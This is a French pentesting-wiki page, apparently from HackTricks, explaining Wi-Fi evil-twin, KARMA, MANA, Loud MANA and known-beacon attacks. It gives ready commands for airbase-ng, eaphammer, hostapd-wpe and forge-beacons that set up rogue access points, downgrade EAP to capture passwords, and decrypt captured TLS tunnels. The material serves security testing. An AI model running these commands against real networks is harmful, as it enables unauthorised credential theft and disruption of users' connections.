Une attaque par jumeau maléfique est un type d'attaque Wi-Fi qui exploite le fait que la plupart des ordinateurs et téléphones ne voient que le "nom" ou ESSID d'un réseau sans fil (la station de base n'étant pas tenue de s'authentifier auprès du client). Cela rend en réalité très difficile de distinguer entre les réseaux ayant le même nom et le même type de chiffrement. En fait, de nombreux réseaux auront plusieurs points d'accès destinés à étendre le réseau, tous utilisant le même nom pour ne pas confondre les utilisateurs.

En raison de la manière dont les clients sont implémentés (rappelons que le protocole 802.11 permet aux stations de se déplacer librement entre les points d'accès au sein du même ESS), il est possible de faire en sorte qu'un appareil change de station de base à laquelle il est connecté. Il est possible de faire cela en offrant un meilleur signal (ce qui n'est pas toujours possible) ou en bloquant l'accès à la station de base originale (paquets de désauthentification, brouillage ou une autre forme d'attaque par déni de service).

Notez également que les déploiements sans fil dans le monde réel ont généralement plus d'un seul point d'accès, et ces points d'accès sont souvent plus puissants et ont une meilleure portée en ligne directe en raison de leur placement vers le plafond. Désauthentifier un seul point d'accès entraîne généralement la migration de la cible vers un autre point d'accès valide plutôt que vers votre point d'accès malveillant, à moins que tous les points d'accès à proximité ne soient désauthentifiés (bruyant) ou que vous soyez très prudent avec le placement du point d'accès malveillant (difficile).

Vous pouvez créer un Jumeau Maléfique Ouvert très basique (sans capacité de router le trafic vers Internet) en faisant :

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Vous pouvez également créer un Evil Twin en utilisant eaphammer (notez que pour créer des evil twins avec eaphammer, l'interface ne doit PAS être en mode monitor) :

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Ou en utilisant Airgeddon : Options : 5,6,7,8,9 (dans le menu d'attaque Evil Twin).

Veuillez noter que par défaut, si un ESSID dans la PNL est enregistré comme protégé par WPA, l'appareil ne se connectera pas automatiquement à un Evil Twin ouvert. Vous pouvez essayer de réaliser un DoS sur le vrai AP et espérer que l'utilisateur se connecte manuellement à votre Evil Twin ouvert, ou vous pourriez réaliser un DoS sur le vrai AP et utiliser un Evil Twin WPA pour capturer la poignée de main (en utilisant cette méthode, vous ne pourrez pas permettre à la victime de se connecter car vous ne connaissez pas la PSK, mais vous pouvez capturer la poignée de main et essayer de la craquer).

Certains OS et AV avertiront l'utilisateur que se connecter à un réseau ouvert est dangereux...

Evil Twin WPA/WPA2

Vous pouvez créer un Evil Twin utilisant WPA/2 et si les appareils sont configurés pour se connecter à cet SSID avec WPA/2, ils vont essayer de se connecter. Cependant, pour compléter la poignée de main en 4 étapes, vous devez également connaître le mot de passe que le client va utiliser. Si vous ne le connaissez pas, la connexion ne sera pas complétée.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Jumeau Maléfique d'Entreprise

Pour comprendre ces attaques, je recommanderais de lire d'abord la brève explication de WPA Enterprise.

Utilisation de hostapd-wpe

hostapd-wpe nécessite un fichier de configuration pour fonctionner. Pour automatiser la génération de ces configurations, vous pourriez utiliser https://github.com/WJDigby/apd_launchpad (téléchargez le fichier python dans /etc/hostapd-wpe/)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Dans le fichier de configuration, vous pouvez sélectionner de nombreuses options différentes telles que ssid, canal, fichiers utilisateur, cret/clé, paramètres dh, version wpa et auth...

Utiliser hostapd-wpe avec EAP-TLS pour permettre à n'importe quel certificat de se connecter.

Utiliser EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Par défaut, EAPHammer utilise ces méthodes d'authentification (remarquez GTC comme première méthode pour essayer d'obtenir des mots de passe en clair, puis l'utilisation de méthodes d'authentification plus robustes) :

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Cette méthode est la méthodologie par défaut pour éviter les longs temps de connexion. Cependant, vous pouvez également spécifier au serveur de servir les méthodes d'authentification de la plus faible à la plus forte :

--negotiate weakest

Ou vous pourriez également utiliser :

  • --negotiate gtc-downgrade pour utiliser une implémentation de déclassement GTC très efficace (mots de passe en clair)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP pour spécifier manuellement les méthodes proposées (proposer les mêmes méthodes d'authentification dans le même ordre que l'organisation rendra l'attaque beaucoup plus difficile à détecter).
  • Trouvez plus d'informations dans le wiki

Utilisation d'Airgeddon

Airgeddon peut utiliser des certificats générés précédemment pour offrir une authentification EAP aux réseaux WPA/WPA2-Enterprise. Le faux réseau va déclasser le protocole de connexion à EAP-MD5 afin de pouvoir capturer l'utilisateur et le MD5 du mot de passe. Plus tard, l'attaquant peut essayer de craquer le mot de passe.
Airgeddon vous offre la possibilité d'une attaque Evil Twin continue (bruyante) ou de créer seulement l'attaque Evil Twin jusqu'à ce que quelqu'un se connecte (douce).

Débogage des tunnels TLS PEAP et EAP-TTLS dans les attaques Evil Twins

Cette méthode a été testée sur une connexion PEAP mais comme je déchiffre un tunnel TLS arbitraire, cela devrait également fonctionner avec EAP-TTLS

Dans la configuration de hostapd-wpe commentez la ligne qui contient dh_file (de dh_file=/etc/hostapd-wpe/certs/dh à #dh_file=/etc/hostapd-wpe/certs/dh)
Cela fera en sorte que hostapd-wpe échange des clés en utilisant RSA au lieu de DH, vous permettant ainsi de déchiffrer le trafic plus tard en connaissant la clé privée du serveur.

Maintenant, démarrez l'Evil Twin en utilisant hostapd-wpe avec cette configuration modifiée comme d'habitude. Démarrez également wireshark sur l'interface qui effectue l'attaque Evil Twin.

Maintenant ou plus tard (lorsque vous aurez déjà capturé certaines tentatives d'authentification), vous pouvez ajouter la clé privée RSA à wireshark dans : Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Ajoutez une nouvelle entrée et remplissez le formulaire avec ces valeurs : IP address = any -- Port = 0 -- Protocol = data -- Key File (sélectionnez votre fichier de clé, pour éviter les problèmes choisissez un fichier de clé sans protection par mot de passe).

Et regardez le nouvel onglet "Decrypted TLS" :

KARMA, MANA, Loud MANA et attaque des balises connues

Listes noires/blanches d'ESSID et de MAC

Le tableau suivant répertorie les différents types de MFACLs (Management Frame Access Control Lists) disponibles, ainsi que leurs effets lorsqu'ils sont utilisés :

# example EAPHammer MFACL file, wildcards can be used
78:f0:97:fc:b5:36
9a:35:e1:01:4f:cf
69:19:14:60:20:45
ce:52:b8:*:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
apples
oranges
grapes
pears

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Les attaques KARMA sont une seconde forme d'attaque par point d'accès malveillant qui exploite le processus de sélection de réseau utilisé par les stations. Dans un livre blanc écrit en 2005, Dino Dai Zovi et Shane Macaulay décrivent comment un attaquant peut configurer un point d'accès pour écouter les requêtes de sondage dirigées et y répondre avec des réponses de sondage dirigées correspondantes. Cela amène les stations affectées à envoyer automatiquement une demande d'association au point d'accès de l'attaquant. Le point d'accès répond alors avec une réponse d'association, provoquant la connexion des stations affectées au point d'accès de l'attaquant.

MANA

Selon Ian de Villiers et Dominic White, les stations modernes sont conçues pour se protéger contre les attaques KARMA en ignorant les réponses de sondage dirigées provenant de points d'accès qui n'ont pas déjà répondu à au moins une demande de sondage de diffusion. Cela a conduit à une baisse significative du nombre de stations vulnérables aux attaques KARMA jusqu'en 2015, lorsque White et de Villiers ont développé un moyen de contourner de telles protections. Dans l'attaque KARMA améliorée de White et de Villiers (attaque MANA), les réponses de sondage dirigées sont utilisées pour reconstruire les PNL des stations à proximité. Lorsqu'une demande de sondage de diffusion est reçue d'une station, le point d'accès de l'attaquant répond avec un SSID arbitraire de la PNL de la station déjà vu dans une sonde directe de cet appareil.

En résumé, l'algorithme MANA fonctionne ainsi : chaque fois que le point d'accès reçoit une demande de sondage, il détermine d'abord s'il s'agit d'une sonde de diffusion ou dirigée. S'il s'agit d'une sonde dirigée, l'adresse MAC de l'expéditeur est ajoutée à la table de hachage (si elle n'y est pas déjà) et l'ESSID est ajouté à la PNL de cet appareil. Le PA répond ensuite avec une réponse de sondage dirigée. S'il s'agit d'une sonde de diffusion, le point d'accès répond avec des réponses de sondage pour chacun des réseaux dans la PNL de cet appareil.

Attaque MANA en utilisant eaphammer :

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Notez que l'attaque MANA standard ne nous permet toujours pas d'attaquer les appareils qui n'utilisent pas du tout de sondage dirigé. Donc, si nous ne connaissons pas non plus au préalable une entrée dans la PNL de l'appareil, nous devons trouver une autre manière de l'attaquer.

Une possibilité est ce qu'on appelle l'attaque Loud MANA. Cette attaque repose sur l'idée que les appareils clients à proximité physique les uns des autres sont susceptibles d'avoir au moins quelques entrées communes dans leurs PNL.

En résumé, l'attaque Loud MANA, au lieu de répondre aux demandes de sondage avec chaque ESSID dans la PNL d'un appareil particulier, le point d'accès malveillant envoie des réponses de sondage pour chaque ESSID dans chaque PNL de tous les appareils qu'il a vus auparavant. En rapportant cela à la théorie des ensembles, nous pouvons dire que le point d'accès envoie des réponses de sondage pour chaque ESSID dans l'union de toutes les PNL des appareils à proximité.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Attaque Known Beacon

Il existe encore des cas où l'attaque Loud MANA ne réussira pas.
L'attaque Known Beacon est une méthode pour "forcer brutalement" les ESSIDs afin d'essayer de faire se connecter la victime à l'attaquant. L'attaquant crée un AP qui répond à n'importe quel ESSID et exécute du code envoyant des balises qui simulent les ESSIDs de chaque nom dans une liste de mots. Avec un peu de chance, la victime contiendra certains de ces noms d'ESSID dans sa PNL et essaiera de se connecter à l'AP factice.
Eaphammer a implémenté cette attaque comme une attaque MANA où tous les ESSIDs dans une liste sont chargés (vous pourriez également combiner cela avec --loud pour créer une attaque Loud MANA + Known beacons) :

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Attaque par rafale de balises connues

Comme les balises connues sont bruyantes. Vous pouvez utiliser un script du projet Eaphammer pour lancer très rapidement des balises de chaque nom ESSID contenu dans un fichier. Si vous combinez ce script avec une attaque MANA d'Eaphammer, les clients pourront se connecter à votre AP.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct est une norme Wi-Fi qui permet aux appareils de se connecter entre eux sans point d'accès sans fil, car l'un des deux appareils agira comme point d'accès (appelé propriétaire du groupe). Vous pouvez trouver Wi-Fi Direct dans de nombreux appareils IoT tels que les imprimantes, les téléviseurs...

Wi-Fi Direct s'appuie sur le Wi-Fi Protected Setup (WPS) pour connecter les appareils de manière sécurisée. WPS dispose de plusieurs méthodes de configuration telles que la Configuration par Push-Button (PBC), l'entrée de PIN et la Communication en Champ Proche (NFC).

Ainsi, les attaques précédemment vues sur le PIN WPS sont également valables ici si le PIN est utilisé.

Détournement EvilDirect

Cela fonctionne comme un Evil-Twin mais pour Wi-Fi Direct, vous pouvez vous faire passer pour un propriétaire de groupe pour essayer de faire connecter d'autres appareils comme des téléphones à vous : airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0

Références

TODO: Jeter un œil à https://github.com/wifiphisher/wifiphisher (connexion avec Facebook et imitation de WPA dans les portails captifs)

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes de bugs !

Aperçus de Hacking
Engagez-vous avec du contenu qui plonge dans le frisson et les défis du hacking.

Nouvelles de Hacking en Temps Réel
Restez à jour avec le monde du hacking en évolution rapide grâce à des nouvelles et des aperçus en temps réel.

Dernières Annonces
Restez informé avec le lancement des dernières primes de bugs et les mises à jour cruciales de la plateforme.

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :